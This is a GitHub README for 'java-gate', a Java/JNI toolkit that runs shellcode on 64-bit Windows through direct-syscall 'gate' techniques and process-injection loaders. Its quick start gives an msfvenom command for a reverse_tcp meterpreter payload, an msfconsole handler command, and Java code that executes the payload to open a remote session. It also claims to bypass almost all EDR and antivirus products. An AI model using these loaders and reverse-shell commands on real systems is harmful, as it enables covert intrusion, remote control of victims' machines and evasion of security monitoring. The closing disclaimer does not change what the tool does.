Skip to content

Java JNI HellsGate/HalosGate/TartarusGate/RecycledGate/SSN Syscall/Many Shellcode Loaders

License

Notifications You must be signed in to change notification settings

4ra1n/java-gate

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

java-gate

中文文档

The java-gate project allows for the implementation of various techniques related to "Hell's Gate" using simple Java code, which involves direct system calls.

byte[] shellcode = new byte[] {(byte)0xfc, (byte)0x48, ...};
HellsGate gate = new HellsGate(shellcode);
gate.exec();

It supports multiple techniques evolved from "Hell's Gate," such as "Halo's Gate," "Recycled Gate," "Tartarus Gate," and so on. In addition to system call-related functions, it provides many common Shellcode injection techniques, such as APC injection and remote thread injection, and is compiled and built using C and NASM/MASM assembly language. Finally, it calls these techniques at the Java layer through JNI. Various low-level techniques can be achieved through simple Java code.

Introduction

Why named "java-gate": This project mainly integrates various techniques related to direct system calls, such as Hell's Gate and Halo's Gate. Therefore, it is named "Java Gate," which can also be understood as a gateway between Java and the underlying system.

Note:

  • This project only supports 64-bit Windows and 64-bit JVM (as per JNI's requirement that a 64-bit JVM can only load 64-bit DLLs).
  • It is recommended to use 64-bit shellcode (e.g., windows/x64/meterpreter/reverse_tcp).
  • Loading shellcode in any way may potentially cause JVM crashes (e.g., if the shellcode does not restore the context).
  • Only tested in JDK 8, other versions of JDK may not be stable.

Quick Start

(1) Add the jitpack repository to your Maven configuration:

<repositories>
    <repository>
        <id>jitpack.io</id>
        <url>https://jitpack.io</url>
    </repository>
</repositories>

(2) Import the project:

<dependency>
    <groupId>com.github.4ra1n</groupId>
    <artifactId>java-gate</artifactId>
    <version>0.0.2</version>
</dependency>

(3) Obtain the shellcode

Here, we'll use meterpreter as an example.

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=YOUR-PORT -f java

(4) Start the msfconsole listener

Here, we'll use meterpreter as an example.

msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_tcp;set LHOST 0.0.0.0;set LPORT YOUR-PORT;run;"

(5) Write a test program

package me.n1ar4;

import me.n1ar4.gate.core.HellsGate;

public class Main {
    public static void main(String[] args) {
        byte buf[] = new byte[]
                {
                        (byte) 0xfc, (byte) 0x48, ...
                };
        HellsGate gate = new HellsGate(buf);
        gate.exec();
    }
}

(6) Go online

The msfconsole connection is successfully established.

The system call modules are as follows. Usage is similar to the previous examples, just change the class name.

Module Class Description Optional
hells-gate me.n1ar4.gate.core.HellsGate Hells Gate /
halos-gate me.n1ar4.gate.core.HalosGate Halos Gate /
recycled-gate me.n1ar4.gate.core.RecycledGate Recycled Gate /
ssn-syscall me.n1ar4.gate.core.SSNSyscall SSN Syscall /
tartarus-gate me.n1ar4.gate.core.TartarusGate Tartarus Gate /

The loader modules are as follows. Usage is similar to the previous examples, just change the class name.

Module Class Description Optional
apc1 me.n1ar4.gate.loader.APC1Loader APC injection using NtTestAlert /
apc2 me.n1ar4.gate.loader.APC2Loader Simple thread-based APC injection /
crt me.n1ar4.gate.loader.CRTLoader Simple remote thread injection Process name
divide me.n1ar4.gate.loader.DivideLoader Create process and inject into it /
early-bird me.n1ar4.gate.loader.EarlyBirdLoader Create new process and APC inject /
etwp me.n1ar4.gate.loader.EtwpLoader EtwpCreateEtwThread-based injection /
rip me.n1ar4.gate.loader.RIPLoader Modify thread context RIP register and execute shellcode /

Here is an example of how to use the command-line tool.

java -jar java-gate.jar [module] [shellcode-hex-string] [optional]

Since the JVM may crash, there is a way to create a new process and execute the code.

java -jar java-gate.jar run-new-jvm [module] [shellcode-hex-string]

This is also an approach, and if you want to run this project in your custom code, you can refer to the code JavaGate#runNewJVM.

Build

There are pre-packaged versions available in the "Release" section, but if you are not confident or need to add your own features, you can manually build it by following these steps:

Please note that this project only supports Windows 64-bit and JVM 64-bit environments, so it can only be compiled and built in that environment.

(1) MSVC x64

The CMake Toolchains use the MSVC x64 tool, and most of the assembly is based on the ml64 compiler from MSVC.

(2) CMake 3.x

The C and assembly code is compiled and built using CMake to generate the corresponding DLL file for JNI. It is recommended to use CLion.

(3) NASM

Most of the assembly is compiled using MASM, but some assembly is compiled using NASM, which needs to be downloaded and configured separately in the PATH.

(4) JDK 8 & Maven

The Java part of the code is built using Java 8 and Maven. It is recommended to use IDEA.

(5) Python 3.x

This project uses Python for some auxiliary tools, which is not actually a necessary option.

Some tests

Almost Bypass all EDR/AV

References and Acknowledgements

Many thanks to the following excellent projects for providing code (most of the code in this project is based on these):

Disclaimer

This tool is intended for cybersecurity research and educational purposes only. It should not be used for any illegal activities.